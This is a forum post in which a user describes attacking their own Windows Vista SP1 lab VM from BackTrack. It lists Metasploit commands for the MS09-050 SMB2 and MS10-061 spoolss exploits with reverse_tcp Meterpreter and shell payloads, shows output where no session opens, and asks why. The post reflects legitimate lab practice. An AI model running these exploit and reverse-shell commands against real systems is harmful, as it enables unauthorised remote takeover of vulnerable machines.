Hello!
I`ve got this problem...
I installed Windows Vista Ultimate 32bit English with SP1 on my VM. Firstly I turned off automatic updates and firewall. With lab prepared like this I started with scanning with nmap on my VM with backtrack 5r1. Os scan results showed:

Code:
OS: Windows Vista (TM) Ultimate 6001 Service Pack 1 (Windows Vista (TM) Ultimate 6.0)
I decided to scan with nessus also. It showed 2 fatal errors. One - MS11-030 - which is not exploitable (so far) and second - MS09-050 which is. So my next step is using metasploit:

Code:
>>use windows/smb/ms09_050_smb2_negotiate_func_index
>>set payload windows/meterpreter/reverse_tcp
>>set rhost 192.168.1.102
>>set lhost 192.168.1.101
>>exploit
okay. Now the problem. It doesn`t work... :

Code:
[*] Started reverse handler on 192.168.1.101:4444 [*] Connecting to the target (192.168.1.102:445)...[*] Sending the exploit packet (872 bytes)...[*] Waiting up to 180 seconds for exploit to trigger...[*] Exploit completed, but no session was created.
boths VMs (backtrack 5r1 and vista) run on my macbook pro with snow leopard and VMware fusion. I use bridged connection to the network.

In addition I can say I tried MS10_061_spoolss - I turned on printer sharing and result was:
Code:
[*] Started reverse handler on 192.168.1.101:4444 [*] Trying target Windows Universal...[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.1.102[\spoolss] ...[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.1.102[\spoolss] ...[*] Everything should be set, waiting for a session...[*] Exploit completed, but no session was created.
I also tried using different payload (windows/shell/reverse_tcp_allports) but it didnt change results.

Anyone can give any advice on my issue?